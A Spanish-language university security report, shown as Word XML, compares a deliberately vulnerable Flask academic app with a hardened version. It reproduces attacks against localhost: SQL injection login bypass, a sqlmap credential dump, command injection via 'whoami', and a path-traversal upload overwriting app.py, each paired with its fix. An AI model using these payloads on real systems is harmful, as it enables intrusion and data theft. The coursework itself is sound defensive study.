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120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>UNIVERSIDAD NACIONAL AGRARIA DE LA SELVA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FACULTAD DE INGENIERIA EN INFORMATICA Y SISTEMAS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ESCUELA PROFESIONAL DE INGENIERIA EN INFORMATICA Y SISTEMAS</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Documento Tecnico de Seguridad</w:t>
        <w:br/>
        <w:t>Sistema Academico de Gestion - V1 insegura vs V2 asegurada</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="36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Alumno: Zelaya Albornoz, Anali Amy</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>IS040704B: Seguridad Informatica</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="36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Docente: Mg. Ramos Estela, Juan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="36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Semestre: 2026 - I</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="36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Tingo Maria - Peru</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Contenido</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1. Identificacion del documento</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. Descripcion del TOE y arquitectura</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. Alcance y herramientas utilizadas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. Matriz de amenazas, vulnerabilidades y evidencia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5. Vulnerabilidades con evidencia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   5.1 VUL-01 SQL Injection - bypass de autenticacion (login)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   5.2 VUL-02 SQL Injection - UNION query y dump con sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   5.3 VUL-03 RCE - Command Injection en /diagnostico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   5.4 VUL-04 RCE - subida de archivo con path traversal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   5.5 VUL-05 SSRF - /estudiantes/importar-foto y /cursos/importar-silabo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   5.6 VUL-06 XSS Almacenado - filtro |safe y upload de .html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   5.7 VUL-07 Broken Access Control - escalada a /admin/usuarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   5.8 VUL-08 CSRF - eliminaciones por GET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   5.9 VUL-09 Fallas criptograficas - passwords en texto plano</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   5.10 VUL-10 Componentes vulnerables - CVE-2024-34069 (Werkzeug 3.0.1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   5.11 VUL-11 Security Misconfiguration - debug=True y trazas expuestas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   5.12 VUL-12 Fuerza bruta sin limite - ausencia de rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   5.13 VUL-13 Fallas de logging y monitoreo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>6. Verificacion de la V2 (bloqueo de los ataques)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>7. Resumen de resultados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>8. Conclusiones y recomendaciones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>9. Referencias normativas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Anexo A. Comandos utilizados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/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1. Identificacion del documento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2"/>
              </w:rPr>
              <w:t>Campo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2"/>
              </w:rPr>
              <w:t>Valor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Titulo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Documento Tecnico de Seguridad - Sistema Academico de Gestion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Norma de referencia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ISO/IEC 15408:2022 (Common Criteria), Partes 1, 2 y 3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Metodologia de evaluacion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ISO/IEC 18045:2022 (evaluacion de seguridad, clase AVA_VAN)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Objeto de evaluacion (TOE)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Aplicacion web academica V2 (asegurada)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Escenario de referencia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V1 deliberadamente vulnerable - rama v1-insegura / carpeta v1/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Alcance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Analisis comparado de seguridad V1 vs V2 con pruebas de penetracion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Fecha de evaluacion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2026-08-01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Clasificacion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Confidencial - uso exclusivamente academico</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 1. Identificacion del documento tecnico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Este documento presenta el analisis de seguridad de una aplicacion web academica construida en dos versiones: la V1 (insegura), que contiene vulnerabilidades deliberadas de OWASP Top 10 2021, y la V2 (asegurada), que las corrige mediante practicas de desarrollo seguro. La evaluacion se documenta siguiendo la estructura de un Security Target (ISO/IEC 15408) y los resultados de las pruebas de penetracion se presentan como evidencia tecnica reproducible.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2. Descripcion del TOE y arquitectura</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>El TOE es la aplicacion web academica V2 (gestion de estudiantes, cursos, notas y archivos). La V1 es el escenario de referencia que materializa las amenazas del entorno. El cuadro siguiente contrasta el stack de cada version.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/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Componente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b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>V1 (insegura)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b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>V2 (asegurada)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Backend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Flask 3.0.3 + Werkzeug 3.0.1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Flask + Gunicorn 23.0.0 (3 workers)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Base de datos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SQLite, passwords en texto plano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SQLite, bcrypt (cost factor 12)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Transporte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HTTP plano (puerto 5001)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HTTPS TLS 1.2/1.3 via Nginx (puerto 443)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Sesion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secret_key hardcodeada '12345', cookies sin flags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secret en .env, cookies HttpOnly/SameSite/Secure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Queries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Concatenacion de strings (SQLi)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Queries parametrizadas (?)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Subida de archivos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Sin validacion, nombre original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Whitelist ext + MIME + magic bytes, fuera del webroot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Control de acceso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Sin RBAC (docente = admin)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RBAC con @admin_required, docente solo lectura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Errores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debug=True, tracebacks expuestos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Paginas 403/404/500 sin trazas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Protecciones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Sin CSRF, sin rate limit, sin headers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CSRF tokens, rate limit + lockout, headers de seguridad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Testing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Ninguno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pytest (59 tests de seguridad)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 2. Comparativa del stack tecnico V1 vs V2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Topologia de despliegue (Docker Compose):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Diagrama de topologia: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Host (Docker Compose)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+-- red "web" (aislada)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|   +-- sistema_nginx :80/:443  -&gt;  TLS (OpenSSL), redirect HTTP-&gt;HTTPS, HSTS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|   |       proxy_pass http://sistema_v2:5000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|   +-- sistema_v2 :5000  -&gt;  Gunicorn + Flask + SQLite (V2 segura)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|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+-- red "lab" (aislada)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|   +-- sistema_v1 :5001  -&gt;  Flask dev, debug=True (V1 insegura)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|   +-- sqlmap (profile "attack", on-demand)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+-- db/  -&gt;  bases de datos versionadas (db/v1.db, db/v2.db)</w:t>
      </w:r>
    </w:p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Figura 1. Arquitectura de despliegue de ambas versiones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3. Alcance y herramientas utilizadas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Las pruebas se realizaron sobre el despliegue local de la V1 (http://localhost:5001) y de la V2 (https://localhost). Todas las pruebas sobre la V2 son no destructivas (no escriben datos).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/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Herramienta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b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Version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b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Uso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sqlmap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1.10.7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SQLi automatizado, dump de la tabla usuarios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curl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8.x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Peticiones manuales HTTP/HTTPS y verificacion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verificar_v2.ps1/.sh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1.0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12 probes no destructivos contra la V2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pytest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7.x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59 tests automatizados de seguridad de la V2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nmap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7.x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Fingerprinting de puertos/servicios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Safety / Bandit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SCA/SAST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Verificacion de dependencias y codigo (documentado)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 3. Herramientas utilizadas en la evaluacion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4. Matriz de amenazas, vulnerabilidades y evidencia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Las amenazas identificadas en el entorno se asocian con las categorias de OWASP Top 10 2021, los CWE correspondientes y las familias de requisitos funcionales de seguridad (SFR) de ISO/IEC 15408 Parte 2 que las contrarrestan en la V2.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/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Amenaza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b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>OWASP Top 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b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>CWE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b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SFR (CC Parte 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b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Evidencia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T-SQLI Bypass de autenticacion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A03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CWE-89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FIA_UAU (autenticacion)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Seccion 5.1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T-SQLI Extraccion de datos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A03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CWE-89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FDP_SDI (integridad de datos)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Seccion 5.2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T-RCE Ejecucion de comandos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A03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CWE-78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FDP_SDI / FPT_ITT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Seccion 5.3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T-RCE Subida de webshell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A03/A08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CWE-434, CWE-22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FDP_SDI / FDP_UIT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Seccion 5.4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T-SSRF Acceso a recursos internos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A10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CWE-918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FDP_NET (comunicaciones)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Seccion 5.5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T-XSS Ejecucion de scripts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A08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CWE-79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FDP_UIT (datos de usuario)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Seccion 5.6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T-ACL Escalada de privilegios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A01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CWE-862, CWE-269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FDP_ACF (control de acceso)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Seccion 5.7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T-CSRF Acciones no autorizadas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A01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CWE-352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FDP_ACF / FIA_UAU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Seccion 5.8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T-CRYPTO Credenciales expuestas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A02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CWE-256, CWE-798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FCS_CKM / FCS_COP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Seccion 5.9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T-COMP Componentes vulnerables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A06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CWE-1104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(aseguramiento, no funcional)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Seccion 5.10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T-MISCONF Trazas y debug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A05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CWE-209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FPT_SDI / FAU_SAR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Seccion 5.11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T-BRUTE Fuerza bruta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A04/A07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CWE-307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FIA_AFL (fallas de autenticacion)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Seccion 5.12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T-LOGGING Ausencia de auditoria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A09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CWE-778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FAU_GEN (generacion de auditoria)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22"/>
              </w:rPr>
              <w:t>Seccion 5.13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 4. Matriz de amenazas, vulnerabilidades y evidencia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/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5. Vulnerabilidades con evidencia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cada vulnerabilidad se documenta con una ficha tecnica, el comando exacto de reproduccion y la evidencia real obtenida durante la prueba. Los ataques se ejecutaron contra la V1 en http://localhost:5001.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.1 VUL-01 SQL Injection - bypass de autenticacion (login)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2"/>
              </w:rPr>
              <w:t>Campo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2"/>
              </w:rPr>
              <w:t>Detalle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Identificador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VUL-01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Categoria OWASP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A03 - Injection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CWE (MITRE)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CWE-89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Criticidad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Critica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Endpoint / ruta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POST /login (app.py)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Causa raiz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Concatenacion directa del parametro username en la sentencia SQL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Impacto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Acceso al sistema sin credenciales validas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 5. Ficha tecnica VUL-01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Reproduccion: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Comando/payload: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curl -s -X POST http://localhost:5001/login \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 xml:space="preserve">  -d "username=admin' OR '1'='1' --&amp;password=x"</w:t>
      </w:r>
    </w:p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Evidencia VUL-01 - reproduccion del ataque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Evidencia obtenida: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Salida real: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HTTP/1.1 302 FOUND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Location: /dashboard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Set-Cookie: session=...; HttpOnly; Path=/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Consulta SQL resultante en el servidor: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SELECT * FROM usuarios WHERE username='admin' OR '1'='1' -- ' AND password='x'</w:t>
      </w:r>
    </w:p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Evidencia VUL-01 - sesion iniciada como admin sin password valida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Correccion aplicada en la V2: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Control implementado (V2):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cursor.execute("SELECT * FROM usuarios WHERE username = ?", (username,))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59 tests verifican que el payload no produce bypass (200, sin redirect)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Verificacion V2 (probe 3): POST con el mismo payload responde 200 en el login, sin redireccion al dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.2 VUL-02 SQL Injection - UNION query y dump con sqlmap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2"/>
              </w:rPr>
              <w:t>Campo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2"/>
              </w:rPr>
              <w:t>Detalle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Identificador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VUL-02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Categoria OWASP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A03 - Injection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CWE (MITRE)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CWE-89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Criticidad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Critica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Endpoint / ruta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GET /estudiantes?buscar= (app.py)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Causa raiz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Concatenacion del parametro buscar en la consulta de listado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Impacto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Extraccion completa de la base de datos (dump)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 6. Ficha tecnica VUL-02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Reproduccion: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Comando/payload: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sqlmap -u "http://localhost:5001/estudiantes?buscar=test" \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 xml:space="preserve">  --cookie="session=&lt;cookie_valida&gt;" --batch --flush-session \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 xml:space="preserve">  --technique=U --level=2 --risk=2 -T usuarios --dump \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 xml:space="preserve">  --output-dir=docs/sqlmap_evidence/estudiantes</w:t>
      </w:r>
    </w:p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Evidencia VUL-02 - sqlmap 1.10.7 contra la busqueda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Evidencia obtenida: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Salida real (docs/sqlmap_evidence/estudiantes/localhost/log):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sqlmap identified the following injection point(s) with a total of 27 HTTP(s) requests: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Parameter: buscar (GET)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 xml:space="preserve">    Type: UNION query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 xml:space="preserve">    Title: Generic UNION query (NULL) - 5 columns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back-end DBMS: SQLite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Database: &lt;current&gt;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Table: usuarios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[2 entries]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+----+---------+----------+----------+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| id | rol     | password | username |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+----+---------+----------+----------+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| 1  | admin   | admin123 | admin    |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| 2  | docente | profesor | profesor |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+----+---------+----------+----------+</w:t>
      </w:r>
    </w:p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Evidencia VUL-02 - dump de la tabla usuarios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Correccion aplicada en la V2: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Control implementado (V2):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cursor.execute("SELECT * FROM estudiantes WHERE nombre LIKE ?", (f"%{buscar}%",))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Probe 9 V2: UNION SELECT no filtra hashes bcrypt (0 coincidencias 2b$12)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>La V1 detectada con boolean-based blind (POST /login) y UNION query (GET /estudiantes). En la V2 el mismo payload no inyecta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.3 VUL-03 RCE - Command Injection en /diagnostico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2"/>
              </w:rPr>
              <w:t>Campo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2"/>
              </w:rPr>
              <w:t>Detalle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Identificador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VUL-03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Categoria OWASP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A03 - Injection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CWE (MITRE)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CWE-78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Criticidad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Critica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Endpoint / ruta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POST /diagnostico (app.py)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Causa raiz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subprocess.run(comando, shell=True) con entrada sin sanear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Impacto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Ejecucion arbitraria de comandos en el servidor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 7. Ficha tecnica VUL-03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Reproduccion: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Comando/payload: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Windows (cmd.exe):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curl -b cookies.txt --data-urlencode "host=127.0.0.1 &amp; whoami" \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 xml:space="preserve">  http://localhost:5001/diagnostico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Linux/Docker (sh):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curl -b cookies.txt --data-urlencode "host=127.0.0.1; whoami" \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 xml:space="preserve">  http://localhost:5001/diagnostico</w:t>
      </w:r>
    </w:p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Evidencia VUL-03 - reproduccion del ataque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Evidencia obtenida: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Salida real (whoami ejecutado):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Acceso denegado. La opcion -c requiere privilegios administrativos.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asus\alebo        &lt;- salida de whoami, ejecutado despues del separador &amp;</w:t>
      </w:r>
    </w:p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Evidencia VUL-03 - ejecucion de whoami en el servidor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Correccion aplicada en la V2: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Control implementado (V2):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ALLOWED = {"fecha", "hostname", "sistema"}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if comando not in ALLOWED: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 xml:space="preserve">    return "Comando no permitido (solo: fecha, hostname, sistema)"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subprocess.run([comando], shell=False, capture_output=True, text=True)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Probe 7 V2: enviar whoami responde "Comando no permitido", sin salida de comandos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4 VUL-04 RCE - subida de archivo con path traversal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2"/>
              </w:rPr>
              <w:t>Campo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2"/>
              </w:rPr>
              <w:t>Detalle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Identificador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VUL-04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Categoria OWASP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A03 / A08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CWE (MITRE)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CWE-434, CWE-22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Criticidad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Critica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Endpoint / ruta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POST /archivos/subir (app.py)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Causa raiz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secure_filename importado pero deliberadamente no usado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Impacto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Sobrescritura de app.py + recarga y ejecucion de codigo (webshell)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Tabla 8. Ficha tecnica VUL-04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Reproduccion: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Comando/payload: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payload.py - codigo que se inyecta como app.py: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import subprocess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with open('PWNED.txt', 'w') as f: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 xml:space="preserve">    f.write(subprocess.getoutput('whoami'))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Subida con traversal de dos niveles (static/uploads -&gt; raiz del proyecto):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curl -b cookies.txt \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 xml:space="preserve">  -F "archivo=@payload.py;filename=../../app.py;type=text/x-python" \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 xml:space="preserve">  http://localhost:5001/archivos/subir</w:t>
      </w:r>
    </w:p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Evidencia VUL-04 - reproduccion del ataque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Evidencia obtenida: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Salida real (log del servidor):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* Detected change in '.../app.py', reloading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El servidor recarga y ejecuta el contenido subido.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Aparece PWNED.txt en la raiz con la salida de whoami.</w:t>
      </w:r>
